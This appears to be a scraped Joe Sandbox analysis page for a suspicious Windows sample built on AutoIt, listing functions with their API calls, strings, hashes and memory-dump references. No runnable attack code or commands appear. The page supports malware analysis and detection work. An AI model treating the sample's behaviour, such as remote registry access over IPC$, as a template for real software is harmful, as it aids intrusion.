Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: f316c2428fd47f3ca3ebeacddc8f1b628009c469ba8e54b7f612fa3ff9f67871
Instruction ID: 78b57e3a1794ffb5440639b42454c32001efbe97b1b1cdd7b360d01c3f7c0d42
Opcode Fuzzy Hash: f316c2428fd47f3ca3ebeacddc8f1b628009c469ba8e54b7f612fa3ff9f67871
Instruction Fuzzy Hash: E381A672A043419FCB24DFA4C844A6AB7E4BF89314F14482EF889DB291D734ED45FB52

Function 00F2C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F2C1FC
GetFocus.USER32 ref: 00F2C20C
GetDlgCtrlID.USER32(00000000), ref: 00F2C217
_memset.LIBCMT ref: 00F2C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F2C36D
GetMenuItemCount.USER32(?), ref: 00F2C38D
GetMenuItemID.USER32(?,00000000), ref: 00F2C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F2C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F2C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F2C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F2C489

Strings

0, xrefs: 00F2C33A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 1bdfa39248a219aa1e4dd67a7822175b3224f8eb71671ff4756b9e1bc52e6f70
Instruction ID: 70512f21274b402970a689eb73163c30b6d5bd77dc428874ae35c55ee285f6b6
Opcode Fuzzy Hash: 1bdfa39248a219aa1e4dd67a7822175b3224f8eb71671ff4756b9e1bc52e6f70
Instruction Fuzzy Hash: DB81B0716083259FD720DF24E894A6FBBE8FF88724F10492DF99597291C731D805EB92

Function 00F1731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F1738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F1739B
CreateCompatibleDC.GDI32(?), ref: 00F173A7
SelectObject.GDI32(00000000,?), ref: 00F173B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F17408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F17444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F17468
SelectObject.GDI32(00000006,?), ref: 00F17470
DeleteObject.GDI32(?), ref: 00F17479
DeleteDC.GDI32(00000006), ref: 00F17480
ReleaseDC.USER32(00000000,?), ref: 00F1748B

Strings

(, xrefs: 00F17410

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 3ef95c0b68c53f1deef4648514a1763f069d851b8c4dd4254525c103f4a40626
Instruction ID: 71ad96417f5f1299a274f9b96883ef53b13f6f08736dfce54d1e743c42d947b5
Opcode Fuzzy Hash: 3ef95c0b68c53f1deef4648514a1763f069d851b8c4dd4254525c103f4a40626
Instruction Fuzzy Hash: D9515A75904309EFCB25DFA8CC84EAEBBB9EF48310F14852DF95A97210C731A945DB50

Function 00EA6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00EC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EA6B0C,?,00008000), ref: 00EC0973

Part of subcall function 00EA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EA4743,?,?,00EA37AE,?), ref: 00EA4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EA6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00EA6CFA

Part of subcall function 00EA586D: _wcscpy.LIBCMT ref: 00EA58A5

Part of subcall function 00EC363D: _iswctype.LIBCMT ref: 00EC3645

Strings

EA06, xrefs: 00EDE452
Bad directive syntax error, xrefs: 00EDE79D
Unterminated string, xrefs: 00EDE7E4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00EDE421
AU3!, xrefs: 00EA6B61
Error opening the file, xrefs: 00EDE43D, 00EDE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 00EDE496

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: e3c155bb3ac8d485886b10c25b289c7a8164f738ffba8291e906bb84b6490028
Instruction ID: f0f1172d87a2fd651d9c2f69c57d43ac19eb334e5147e6f95108b4f626029fc7
Opcode Fuzzy Hash: e3c155bb3ac8d485886b10c25b289c7a8164f738ffba8291e906bb84b6490028
Instruction Fuzzy Hash: 1902B1711083409FC714EF20C841AAFBBE5FF9A354F14581EF495AB2A1DB31E94ACB52

Function 00F02D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F02D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F02DDD
GetMenuItemCount.USER32(00F65890), ref: 00F02E66
DeleteMenu.USER32(00F65890,00000005,00000000,000000F5,?,?), ref: 00F02EF6
DeleteMenu.USER32(00F65890,00000004,00000000), ref: 00F02EFE
DeleteMenu.USER32(00F65890,00000006,00000000), ref: 00F02F06
DeleteMenu.USER32(00F65890,00000003,00000000), ref: 00F02F0E
GetMenuItemCount.USER32(00F65890), ref: 00F02F16
SetMenuItemInfoW.USER32(00F65890,00000004,00000000,00000030), ref: 00F02F4C
GetCursorPos.USER32(?), ref: 00F02F56
SetForegroundWindow.USER32(00000000), ref: 00F02F5F
TrackPopupMenuEx.USER32(00F65890,00000000,?,00000000,00000000,00000000), ref: 00F02F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F02F7E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 4a2bf1c6d1b0c3f9051b40e06b53122700af32a1526afe8b8daefe21ebb9845b
Instruction ID: 92dd92add6e40a26d54a9aa818a59119b0c69d0766a79582437910fb6874ccac
Opcode Fuzzy Hash: 4a2bf1c6d1b0c3f9051b40e06b53122700af32a1526afe8b8daefe21ebb9845b
Instruction Fuzzy Hash: 1571E571A41209BAEB618F54DC8DFAABF64FF04764F140226F615AA1E1C7B15C14F7A0

Function 00EF77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

_memset.LIBCMT ref: 00EF786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EF78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EF78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EF78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EF7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EF792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EF7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EF793A

Strings

\CLSID, xrefs: 00EF7822
\IPC$, xrefs: 00EF7882
SOFTWARE\Classes\, xrefs: 00EF780C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: f7b8b142f5d11d7b3ffd8ecf1defe6a3db1e1e25b267bf1407315159a58681d9
Instruction ID: 2fe876eaef21acbed4dafd63858fc9950fab88a39741ca3e4f469b51fff041aa
Opcode Fuzzy Hash: f7b8b142f5d11d7b3ffd8ecf1defe6a3db1e1e25b267bf1407315159a58681d9
Instruction Fuzzy Hash: 2F413872C1422DABCF25EBA4EC85DEEB7B8BF48310F405069E945B7161DB30AD09CB90

Function 00F20E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F1FDAD,?,?), ref: 00F20E31

Strings

HKCR, xrefs: 00F20ED9
HKEY_LOCAL_MACHINE, xrefs: 00F20E9A
HKEY_CLASSES_ROOT, xrefs: 00F20EC4
HKEY_CURRENT_CONFIG, xrefs: 00F20EEE
HKCU, xrefs: 00F20F21
HKU, xrefs: 00F20F43
HKEY_CURRENT_USER, xrefs: 00F20F10
HKEY_USERS, xrefs: 00F20F32
HKLM, xrefs: 00F20EAF
HKCC, xrefs: 00F20EFF

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: ec650ea56f36d229bce8ef7d2be96b266499dd5e1fb07c8ce082dd45760a3eb5
Instruction ID: 664d16b08e298d9da695ed7470131fb949afcbd4c6b27c990f4aea781ee48744
Opcode Fuzzy Hash: ec650ea56f36d229bce8ef7d2be96b266499dd5e1fb07c8ce082dd45760a3eb5
Instruction Fuzzy Hash: F641AC3254825ACBCF14EF10EA51AEF37A4EF15310F055418FC612B293DB71AD2AEBA0

Function 00EFF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EDE2A0,00000010,?,Bad directive syntax error,00F2F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00EFF7C2
LoadStringW.USER32(00000000,?,00EDE2A0,00000010), ref: 00EFF7C9

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

_wprintf.LIBCMT ref: 00EFF7FC
__swprintf.LIBCMT ref: 00EFF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EFF88D

Strings

., xrefs: 00EFF873
%s (%d) : ==> %s.: %s %s, xrefs: 00EFF7F7
Error: , xrefs: 00EFF85B
Line %d (File "%s"):, xrefs: 00EFF833
Line %d:, xrefs: 00EFF818

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: b8af76379ceb284bba31f97e68ad16e54e344ca5d65b81178c7209af366e85a1
Instruction ID: 2abe0fd4ec9689917d0d51e5525001a1287a080b09f967dc03b21517cffaae21
Opcode Fuzzy Hash: b8af76379ceb284bba31f97e68ad16e54e344ca5d65b81178c7209af366e85a1
Instruction Fuzzy Hash: 0321713290021DEBCF11EFA0CC1AEFE7779BF18311F045469F6157A0A2EA31A619DB51

Function 00F052C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00EA7BCC: _memmove.LIBCMT ref: 00EA7C06

Part of subcall function 00EA7924: _memmove.LIBCMT ref: 00EA79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F05330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F05346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F05357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F05369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F0537A

Strings

play PlayMe, xrefs: 00F05375
play PlayMe wait, xrefs: 00F05364
alias PlayMe, xrefs: 00F05309
status PlayMe mode, xrefs: 00F0532B
open , xrefs: 00F052DF
close PlayMe, xrefs: 00F05341, 00F0536E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: eaaa692e2bfb8f1e5a7db2f4ce090e0f5f90b12deded73e57ab00abffd958e6b
Instruction ID: a2f9f06f25f318898a335aa8fcd5820af07c65716fafa5fb8d7b6148f3ccdc88
Opcode Fuzzy Hash: eaaa692e2bfb8f1e5a7db2f4ce090e0f5f90b12deded73e57ab00abffd958e6b
Instruction Fuzzy Hash: 28119021A5012D79D720F661DC4ADFFBBBCEBDAF90F400429B941B60D1DEA05D09E9A1

Function 00F046B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F046D2
gethostname.WSOCK32(?,00000100), ref: 00F046EC
gethostbyname.WSOCK32(?), ref: 00F046F9
_wcscpy.LIBCMT ref: 00F04721
_memmove.LIBCMT ref: 00F04734
inet_ntoa.WSOCK32(?), ref: 00F0473F
_strcat.LIBCMT ref: 00F0474D
_wcscpy.LIBCMT ref: 00F04764
WSACleanup.WSOCK32 ref: 00F04772
_wcscpy.LIBCMT ref: 00F04780

Strings

0.0.0.0, xrefs: 00F0471B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 79560a27a095bd89df39a04d94f96315ca164154001bf1045aae72299da3ff9e
Instruction ID: 9b23bd7340d4d4f83017cb27d5bee1bd10c439cba446abc00bf96bf1371e811b
Opcode Fuzzy Hash: 79560a27a095bd89df39a04d94f96315ca164154001bf1045aae72299da3ff9e
Instruction Fuzzy Hash: 55110871900118AFCB24AB70AC46FDA77BCDB01721F0001B9FA45A2091EF719D86BA50

Function 00F04F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F04F7A

Part of subcall function 00EC049F: timeGetTime.WINMM(?,76AAB400,00EB0E7B), ref: 00EC04A3

Sleep.KERNEL32(0000000A), ref: 00F04FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F04FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F04FEC
SetActiveWindow.USER32 ref: 00F0500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F05019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F05038
Sleep.KERNEL32(000000FA), ref: 00F05043
IsWindow.USER32 ref: 00F0504F
EndDialog.USER32(00000000), ref: 00F05060

Strings

BUTTON, xrefs: 00F04FDE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4c1f747bf961a9d9448ac5f8bc678d8584c48f719c946f1363da4d911568c71e
Instruction ID: b382c86eb11344cf7d86ff34d2668743eeb8991979297a95e369affa650d0616
Opcode Fuzzy Hash: 4c1f747bf961a9d9448ac5f8bc678d8584c48f719c946f1363da4d911568c71e
Instruction Fuzzy Hash: 7221C97060060EBFE7205F20EC8AF2A7B79EB05B59F081034F512D21F5CBB29D55BA62

Function 00F0D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

CoInitialize.OLE32(00000000), ref: 00F0D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F0D67D
SHGetDesktopFolder.SHELL32(?), ref: 00F0D691
CoCreateInstance.OLE32(00F32D7C,00000000,00000001,00F58C1C,?), ref: 00F0D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F0D74C
CoTaskMemFree.OLE32(?,?), ref: 00F0D7A4
_memset.LIBCMT ref: 00F0D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00F0D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F0D840
CoTaskMemFree.OLE32(00000000), ref: 00F0D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F0D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00F0D880

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: aa661120ab316ee6321749c5352c59d56a34f4ef454551aa978995b5fbc64444
Instruction ID: 8ab2a10a449ab995b610e5b0380d6fe63afcf89e6ac1615c504c9b81fd957c11
Opcode Fuzzy Hash: aa661120ab316ee6321749c5352c59d56a34f4ef454551aa978995b5fbc64444
Instruction Fuzzy Hash: 10B1FA75A00109AFDB14DFA4C888EAEBBF9FF49314F148469E909EB261DB30ED45DB50

Function 00EFC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00EFC283
GetWindowRect.USER32(00000000,?), ref: 00EFC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EFC2F3
GetDlgItem.USER32(?,00000002), ref: 00EFC2FE
GetWindowRect.USER32(00000000,?), ref: 00EFC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EFC364
GetDlgItem.USER32(?,000003E9), ref: 00EFC372
GetWindowRect.USER32(00000000,?), ref: 00EFC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EFC3C6
GetDlgItem.USER32(?,000003EA), ref: 00EFC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EFC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00EFC3FE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 29c4eaeb147897010d737dd62db40824b4ff94383c74cf97eafdc40199e4c617
Instruction ID: bd99349156fd1d2e0ebf053ca6c015d74e4ff80bbf77a078922413ba66d023ad
Opcode Fuzzy Hash: 29c4eaeb147897010d737dd62db40824b4ff94383c74cf97eafdc40199e4c617
Instruction Fuzzy Hash: 28513271B10209AFDB18CFA9DD85AAEBBB6EB88714F24813DF615E7290D7709D058B10

Function 00EA201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA2036,?,00000000,?,?,?,?,00EA16CB,00000000,?), ref: 00EA1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EA20D3
KillTimer.USER32(-00000001,?,?,?,?,00EA16CB,00000000,?,?,00EA1AE2,?,?), ref: 00EA216E
DestroyAcceleratorTable.USER32(00000000), ref: 00EDBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EA16CB,00000000,?,?,00EA1AE2,?,?), ref: 00EDBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EA16CB,00000000,?,?,00EA1AE2,?,?), ref: 00EDBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EA16CB,00000000,?,?,00EA1AE2,?,?), ref: 00EDBD0A
DeleteObject.GDI32(00000000), ref: 00EDBD1C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
